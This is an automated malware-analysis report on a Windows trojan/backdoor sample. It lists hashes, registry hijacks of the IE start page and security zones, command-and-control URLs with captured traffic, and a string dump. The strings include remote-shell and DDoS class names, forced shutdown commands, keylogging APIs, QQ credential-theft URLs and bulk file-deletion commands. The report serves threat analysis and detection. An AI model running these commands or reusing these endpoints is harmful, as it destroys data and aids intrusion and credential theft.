Trojan.GenericKD.3338245_4b8b3a80b4

by malwarelabrobot on July 27th, 2016 in Malware Descriptions.

Trojan:Win32/Startpage.PVO!bit (Microsoft), Backdoor.Win32.Hupigon.sqck (Kaspersky), BackDoor.Pigeon1.10442 (DrWeb), Artemis!4B8B3A80B48A (McAfee), Heur.AdvML.B (Symantec), Trojan-Dropper.Win32.Binder (Ikarus), Win32:GenMalicious-BMU [Trj] (Avast), Trojan.GenericKD.3338245 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, GenericEmailWorm.YR, GenericInjector.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan-PSW, Trojan, Backdoor, Worm, EmailWorm, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 4b8b3a80b48a4f9ea1c1d472d2252b2b
SHA1: 5bb89cae73d474b64897cfd5106bda6fc92723b8
SHA256: b5ae89230d38f3e684c0f76da3d8e53080f38833791cd40164517224a0d63652
SSDeep: 49152:pkHYMdzB5phGWnp9TmM3fuETSIgxef5DWh2:yHYMlB5phGWnDio
Size: 2621440 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: Upack_Patch, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2016-03-26 05:27:50
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:348

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IFK30NOL\dlldy[1].htm (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IFK30NOL\gengxin[1].htm (232 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
C:\svchost.exe (3797 bytes)
C:\Proxy.dll (151 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@xie6[1].txt (203 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IFK30NOL\dlldy[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IFK30NOL\gengxin[1].htm (0 bytes)

Registry activity

The process %original file name%.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 51 38 FF 75 AE C7 85 21 91 00 F8 06 43 87 1A"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "www.2345.com/?k744606640!"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\InternetExplorer\Main]
"Start Page" = "www.2345.com/?k744606640o!"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
6be57b5f84b3ae053023dbf7d64ab7e1 c:\Program Files\Common Files\Microsoft Shared\MSInfo\svchost.exe
09bb1d6f550faf017a09f391bae63d89 c:\Proxy.dll
6be57b5f84b3ae053023dbf7d64ab7e1 c:\svchost.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ??????
Product Name: ??????
Product Version: 2.6.0.0
Legal Copyright: ??????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.6.0.0
File Description: ???????????!
Comments: ??????
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 985599 987136 4.50205 e28ba08901e86eb24af042287fb0be3f
.rdata 991232 1401650 1404928 4.52131 10d39b2f4fb0b3e2d8ac2712da43fd12
.data 2396160 487178 126976 3.89171 22627bcfa797712d62d10f1694ebbfa1
.rsrc 2883584 94416 98304 2.99211 1436dc4ad98f5e2b1e9b7a67c343a2b4

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://rj.xie6.cn/gengxin.asp?_r=17692 162.159.211.13
hxxp://rj.xie6.cn/xiazai/xzProxy.asp 162.159.211.13
hxxp://rj.xie6.cn/dlldy.asp?cz=hqfwq&bs=QINGQIU 162.159.211.13
hxxp://rj.xie6.cn/dlldy.asp?cz=hqzjip 162.159.211.13
778691.dowei8.com 119.90.136.25


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /dlldy.asp?cz=hqfwq&bs=QINGQIU HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
User-Agent: 5349
Host: rj.xie6.cn
Cache-Control: no-cache
Cookie: __cfduid=d20f2012503565353f9d40ef5f666b9521469525508; ASPSESSIONIDQARSDDQB=BBIBCPFDPLOBFNEDLIJOAAKO


HTTP/1.1 200 OK
Date: Tue, 26 Jul 2016 09:32:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: private
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 2c86d7fcb0ab3ff6-SOF
2b..ok:115.28.160.178:6400|115.28.160.178:6000|..0......


GET /dlldy.asp?cz=hqzjip HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
Host: rj.xie6.cn
Cache-Control: no-cache
Cookie: __cfduid=d20f2012503565353f9d40ef5f666b9521469525508; ASPSESSIONIDQARSDDQB=BBIBCPFDPLOBFNEDLIJOAAKO


HTTP/1.1 200 OK
Date: Tue, 26 Jul 2016 09:32:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: private
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 2c86d81515343ff6-SOF
11..ip:194.242.96.218..0..HTTP/1.1 200 OK..Date: Tue, 26 Jul 2016 09:3
2:27 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connect
ion: keep-alive..Cache-Control: private..Vary: Accept-Encoding..X-Powe
red-By: ASP.NET..Server: yunjiasu-nginx..CF-RAY: 2c86d81515343ff6-SOF.
.11..ip:194.242.96.218..0..



GET /gengxin.asp?_r=17692 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: rj.xie6.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 26 Jul 2016 09:32:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d20f2012503565353f9d40ef5f666b9521469525508; expires=Wed, 26-Jul-17 09:31:48 GMT; path=/; domain=.xie6.cn; HttpOnly
Cache-Control: private
Vary: Accept-Encoding
Set-Cookie: ASPSESSIONIDQARSDDQB=BBIBCPFDPLOBFNEDLIJOAAKO; path=/
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 2c86d73ca16c403e-SOF
e8..416B1BD09594E42FB1E8ADF1280D5C2B5AB6E09F50956C14DC636013AF636312D2
5D5BEE288489943286E61CDC686615DD646611D9116367D8166613DC116364DD686718
DC656217D8156712DC156367DD686718DC616660DC616718D8166619DD116411DD6267
67DD686618D8156710DD636611..0......


GET /xiazai/xzProxy.asp HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: rj.xie6.cn
Connection: Keep-Alive
Cookie: __cfduid=d20f2012503565353f9d40ef5f666b9521469525508; ASPSESSIONIDQARSDDQB=BBIBCPFDPLOBFNEDLIJOAAKO


HTTP/1.1 522 Origin Connection Time-out
Date: Tue, 26 Jul 2016 09:32:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Server: yunjiasu-nginx
CF-RAY: 2c86d793bf58403e-SOF
1bc8..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no
-js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
;    <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&
gt;.<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-
US"> <![endif]-->.<!--[if gt IE 8]><!--> <html
 class="no-js" lang="en-US"> <!--<![endif]-->.<head>
.<meta http-equiv="refresh" content="0">..<meta http-equiv="s
et-cookie" content="cf_use_ob=80; expires=Tue, 26-Jul-16 09:32:47 GMT;
 path=/">..<meta http-equiv="set-cookie" content="cf_ob_info=522
:2c86d793bf58403e:SOF; expires=Tue, 26-Jul-16 09:32:47 GMT; path=/">
;...<title>rj.xie6.cn | 522: ............</title>.<meta
 charset="UTF-8" />.<meta http-equiv="Content-Type" content="tex
t/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" con
tent="IE=Edge,chrome=1" />.<meta name="robots" content="noindex,
 nofollow" />.<meta name="viewport" content="width=device-width,
initial-scale=1,maximum-scale=1" />.<link rel="stylesheet" id="y
js_styles-css" href="/cdn-cgi/styles/baidu.errors.css" type="text/css"
 media="screen,projection" />.<!--[if lt IE 9]><link rel="
stylesheet" id='yjs_styles-ie-css' href="/cdn-cgi/styles/baidu.errors.
ie.css" type="text/css" media="screen,projection" /><![endif]--&
gt;.<style type="text/css">body{margin:0;padding:0}</style>
;.<!--[if lte IE 9]><script type="text/javascript" src="/
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_348:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
user32.dll
gdiplus.dll
Kernel32.dll
kernel32.dll
KERNEL32.DLL
ntdll.dll
psapi.dll
IPHLPAPI.DLL
iphlpapi.dll
ole32.dll
Proxy.dll
shell32.dll
winmm.dll
advapi32.dll
GdiPlus.dll
wininet.dll
shlwapi.dll
ws2_32.dll
Gdiplus.dll
Ole32.dll
EnumWindows
GetAsyncKeyState
SetTcpEntry
GetExtendedTcpTable
RegCloseKey
RegCreateKeyA
RegOpenKeyA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
{A068799B-7551-46b9-8CA8-EEF8357AFEA4}
139550467
crossfire.exe
10031950
10031830
03023050
05015260
03018280
03693502
90 90 90 90 90
03023052
03693509
03156229
TenSafe_1.exe
TenSafe_2.exe
GameDataPlatformServer.exe
Tencentdl.exe
CrossProxy.exe
d3d9.dll
TerSafe.dll
AudioHook.dll
CrossFire.exe
00000000
10000000
TenSP.dll
TenRpcs.dll
TenSLX.dll
crossfireBase.dll
BugTrack.dll
MSVCR90.dll
fmodex.dll
mswsock.dll
MSVCR80.dll
999999999
07000000
NTDLL.DLL
TenSafe.exe
Tensafe_1.exe
Tensafe_2.exe
tgp_gamead.exe
TXPlatform.exe
BackgroundDownloader.exe
TenQQDLSafe.exe
cmd.exe
CrossSSOHOlder.exe
0000260000
0000330000
0100260000
0100340000
0200260000
0300260000
0400260000
0500260000
0600260000
0700260000
0800260000
0300000001
0000790000
0000040000
0000000001
/svchost.exe
.idata
.rdata
P.reloc
P.rsrc
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
OnKeyDown
OnKeyPress
OnKeyUp
THintActionD%C
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecute
svchost.exe
778691.dowei8.com
127.0.0.1
%Program Files%\ie8\
Windows
iexplore.exe
SourcePort
DestPort
UnitTCPIP
TCPIPORT
TCPIPORT4
1.2.3
<?xml version="1.0" encoding="UNICODE"?><tree2xml app="SVCHOST.exe">
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
(The key is too long to be read.)
HKEY_DYN_DATA
Microsoft\Network\Connections\pbk\rasphone.pbk
rasapi32.dll
rnaph.dll
cmd /c "
%dMB,
" WindowsPath="
" ExeShortName="
" ExeFileName="
\Software\Microsoft\Windows\CurrentVersion\uninstall
\software\microsoft\windows\currentversion\uninstall\
TRemoteShellCmdU
TtcpDDOSThread
TwebDDOSThread
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)
hXXp://
cmd /c shutdown -s -f -t 0
cmd /c shutdown -r -f -t 0
Down.exe
Set objws=WScript.CreateObject("wscript.shell")
objws.Run kavpath,,true
ctfmon.exe
Move.exe
Port
UDPSockError
TMYNMUDP
MYNMUDP
RemotePort<
LocalPort<
ReportLevelL
0.0.0.0
%d.%d.%d.%d
FilterGraph %p pid %x
D:\dat_aq\DSPACK234\src\DSPack\DSUtil.pas
($%x).
vpDoNotRenderColorKeyAndBorder
Operation
TOnDVDCMD
CmdID
OnDVDCMDStartx0I
OnDVDCMDEndL[A
OnDVDWarningFormatNotSupportedL[A
D:\dat_aq\DSPACK234\src\DSPack\DSPack.pas
FormKeyDown
Msxml2.XMLHTTP
\Program Files\Internet Explorer\iexplore.exe
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
GetKeyboardType
RegOpenKeyExA
ReportEventA
RegQueryInfoKeyA
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
WinExec
GetWindowsDirectoryA
GetCPInfo
CreatePipe
mpr.dll
version.dll
gdi32.dll
SetViewportOrgEx
keybd_event
UnhookWindowsHookEx
SetWindowsHookExA
SetProcessWindowStation
OpenWindowStationA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetProcessWindowStation
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumThreadWindows
CloseWindowStation
ActivateKeyboardLayout
ShellExecuteExA
ShellExecuteA
SHFileOperationA
InternetOpenUrlA
URLMON.DLL
URLDownloadToFileA
wsock32.dll
avicap32.dll
imagehlp.dll
ADVAPI32.DLL
DeleteUrlCacheEntry
quartz.dll
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
(*),,,0001
!!! ###%%$
n.2.Ýdddddddd
KWindows
UrlMon
.ScktComp
IMYNMUDP
CMDUnit
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
VMROptions.Mode
MediaType.data
BaseFilter.data
<requestedExecutionLevel level="requireAdministrator"/>
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)
lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
crossfire.exe.
192.168.0.100
60.174.156.33
1024*768
atl71.dll
.inidata
@.reloc
CNotSupportedException
CCmdTarget
commctrl_DragListMsg
COMCTL32.DLL
__MSVCRT_HEAP_SELECT
KERNEL32.dll
ADVAPI32.dll
WS2_32.dll
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
WINSPOOL.DRV
comdlg32.dll
SHELL32.dll
SWNPM.dll
.PAVCException@@
.PAVCArchiveException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
4"5(5,50545
8!8/878=8
3"32383|3"4
2 3=3Q3^3h3r3z3
4 41484[4}4
9$9(9,90989
<0=4=8=<=
H%X0C
=0.pK
Z,7
it.Dx
Kc%S*3
](.FuX
.pLUBa
.AMUr_
WINMM.dll
DLL.dll
myDrawIndexedPrimitive_2
*@CShell.dll
10139320
31 57 29 9
84 22 14 70 6
84 22 14 70 4
31 69 62 88 98
35 38 72 78 43
33 72 07 08 45
33 00 83 60 77
02267964
06000000
/Proxy.dll
f9z.vk
CreateIoCompletionPort
GetProcessHeap
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
SHLWAPI.dll
Proxy_1.271.dll
HNetCfg.FwMgr
/gengxin.asp?_r=
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
_.tmp
https
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
@hXXps://
@/dlldy.asp?cz=hqfwq&bs=QINGQIU
/dlldy.asp?cz=hqzjip
http:
Client:VVV.xie6.cn
[email protected]
urlmon
WinINet.dll
program internal error number is %d.
%s%x.tmp
:"%s"
:"%s".
<Msg%s>%ld</Msg%s>
0000%d
</Msg0000>
<Msg0000>
EMSG
Recv Sub Packet(%s)..
Recv Packet (%s)...
zcÁ
3<3I3Z3q3{3
6l6Q6^6n6
VVV.2345.com/?k744606640
VVV.2345.com/?keyybc
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\MainHKEY_CLASSES_ROOT
{B96B3CAF-0728-11D3-9D7B-0000F81EF32E}
{B96B3CAB-0728-11D3-9D7B-0000F81EF32E}
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?uin=
skey
qun.qzone.qq.com
for(var i=0,len=str.length;i<len;  i){
hash =(hash<<5) str.charCodeAt(i);
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
hXXps://
hXXp://ui.ptlogin2.qq.com/cgi-bin/login?appid=710044101&s_url=hXXp://ctc.qzs.qq.com/ac/qzone/widget/login/succ.html&style=13&hide_title_bar=1&daid=151
if not "%choice%"=="" set choice=%choice%
If /I "%Choice%"=="1" Goto xtlj
If /I "%Choice%"=="2" Goto kkhc
If /I "%Choice%"=="3" Goto ttsc
If /I "%Choice%"=="A" Goto ALL
If /I "%Choice%"=="" exit
del /f /s /q %systemdrive%\*.tmp
del %windir%\2950800.txt /f /q
for /f %%i in (%windir%\2950800.txt) do rd %windir%\%%i /s /q
dir %windir%\$NtUninstall* /a:d /b >%windir%\2950800.txt
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.pnf
del /f /s /q %systemdrive%\infcache.1
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
del /f /s /q %windir%\system32\cid_store.dat
md %windir%\system32\cid_store.dat
attrib  s  h  r %windir%\system32\cid_store.dat
del /f /s /q %windir%\system32\pub_store.dat
md %windir%\system32\pub_store.dat
attrib  s  h  r %windir%\system32\pub_store.dat
del /f /s /q %windir%\system32\xlhcc.dat
md %windir%\system32\xlhcc.dat
attrib  s  h  r %windir%\system32\xlhcc.dat
rd /s /q "c:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "d:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "e:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "f:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "G:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "h:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "I:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "j:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "k:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "l:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "m:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "n:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "o:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "p:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "q:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "r:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "s:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "t:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "u:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "v:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "w:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "x:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "y:\$recycle.bin\vod_cache_data" 2>NUL
rd /s /q "z:\$recycle.bin\vod_cache_data" 2>NUL
%WinDir%\
google chrome
Google Chrome
Super-EChXXp://ec.360bc.cnhXXp://VVV.eyybc.com/forumdisplay.php?fid=17/memcp.php/ip.asp/time.asp/gonggao.txt/ec-user6.php/ec-bd.php/ec-jh.php
hXXp://VVV.super-ec.cn
<input type="text" name="field_2new" size="25" value="" disabled class="txt" />" class="txt" />Function Getcpuid()
Set cpuSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_Processor")
getcpuid=cpu.ProcessorId
{633C80A4-1843-482b-9EF2-BE2834C5FDD4}
*.txt
|*.txt
Webdings
g_kj_web
g_kj_msg
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.2.18
%*.*f
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Broken pipe
Inappropriate I/O control operation
Operation not permitted
MPR.dll
VERSION.dll
AVIFIL32.dll
RASAPI32.dll
CreateDialogIndirectParamA
GetViewportOrgEx
GetViewportExtEx
RegEnumKeyA
oledlg.dll
WSOCK32.dll
Shell32.dll
Mpr.dll
Advapi32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
%s\ESPI%d.dll
hXXp://dywt.com.cn
[email protected]
 86(0411)88995834
 86(0411)88995831
(ESPINN.dll(NN
This is a runtime library file for EPL applications. The EPL is a software development environment. For details please visit VVV.dywt.com.cn/info
